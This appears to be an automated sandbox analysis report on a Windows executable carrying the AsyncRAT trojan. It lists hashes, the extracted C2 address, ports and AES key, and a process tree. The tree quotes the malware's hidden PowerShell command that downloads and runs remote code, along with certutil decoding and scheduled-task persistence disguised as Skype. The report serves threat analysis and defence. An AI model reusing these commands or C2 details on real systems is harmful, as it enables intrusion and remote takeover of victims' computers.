Analysis

  • max time kernel
    143s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    18-04-2021 08:01

General

  • Target

    200CB4B34EA0E61FE8454731BF7A107A.exe

  • Size

    1.9MB

  • MD5

    200cb4b34ea0e61fe8454731bf7a107a

  • SHA1

    a6121f8f7d8600c2278e90d5ae622c9b2d3b410b

  • SHA256

    3deec916d94fabdc65168ebd8b5f072a702781064d13b10700d9a52998a669a3

  • SHA512

    62c947626012a18c3a4644ff24909b1c2a3a427b1df4529139eb54bb74da12b5299aca0070d4b0deee168098ea7474207868644e82917bdbf130797f1676fe99

Malware Config

Extracted: ps1.dropper

  • Language

    ps1

  • URLs

    https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3

Extracted: aes.plain

  • Family

    asyncrat

  • Version

    0.5.7B

  • C2

    46.1.54.174:87
    46.1.54.174:85

  • Mutex

    AsyncMutex_6SI8OkPnk

  • Attributes
    • aes_key
      R77ian3L214LimJgd0qPoT0OH274e11M
    • anti_detection
      false
    • autorun
      false
    • bdos
      false
    • delay
      strings
    • host
      46.1.54.174
    • hwid
      3
    • install_file
      (empty)
    • install_folder
      %AppData%
    • mutex
      AsyncMutex_6SI8OkPnk
    • pastebin_config
      null
    • port
      87,85
    • version
      0.5.7B

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Drops startup file 5 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\200CB4B34EA0E61FE8454731BF7A107A.exe
    "C:\Users\Admin\AppData\Local\Temp\200CB4B34EA0E61FE8454731BF7A107A.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1908
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\DVDFabPlayer5Activator.cmd" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:64
      • C:\Windows\system32\cacls.exe
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        3⤵
        PID:1892
      • C:\Windows\system32\certutil.exe
        certutil -decode "C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp" "C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec"
        3⤵
        PID:4264
      • C:\Windows\system32\attrib.exe
        attrib +r "C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec"
        3⤵
        • Views/modifies file attributes
        PID:4364
    • C:\Users\Admin\AppData\Roaming\Ne - Copy.exe
      "C:\Users\Admin\AppData\Roaming\Ne - Copy.exe"
      2⤵
      • Executes dropped EXE
      • Drops startup file
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:1268
      • C:\ProgramData\conhost.exe
        C:\ProgramData/conhost.exe
        3⤵
        • Executes dropped EXE
        • Drops startup file
        • Adds Run key to start application
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:1884
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe
          4⤵
          • Creates scheduled task(s)
          PID:3736
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\winlogon.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1708
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Roaming\winlogon.vbs'))"
        3⤵
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1120
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3416
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2296
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:4180
  • C:\ProgramData\conhost.exe
    C:\ProgramData\conhost.exe
    1⤵
    • Executes dropped EXE
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4804
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn Skype /tr "C:\ProgramData\conhost.exe
      2⤵
      • Creates scheduled task(s)
      PID:4864

MITRE ATT&CK Matrix (ATT&CK v6)

  • Execution
    • Scheduled Task (T1053): 1
  • Persistence
    • Registry Run Keys / Startup Folder (T1060): 1
    • Scheduled Task (T1053): 1
    • Hidden Files and Directories (T1158): 1
  • Privilege Escalation
    • Scheduled Task (T1053): 1
  • Defense Evasion
    • Modify Registry (T1112): 2
    • Install Root Certificate (T1130): 1
    • Hidden Files and Directories (T1158): 1
  • Discovery
    • System Information Discovery (T1082): 1

Downloads

  • C:\ProgramData\conhost.exe
  • C:\ProgramData\conhost.exe.manifest
  • C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.rec
  • C:\Users\Admin\AppData\Roaming\DVDFab Player 5\regRecord\localuse.tmp
  • C:\Users\Admin\AppData\Roaming\DVDFabPlayer5Activator.cmd
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe
  • C:\Users\Admin\AppData\Roaming\Ne - Copy.exe
  • C:\Users\Admin\AppData\Roaming\winlogon.vbs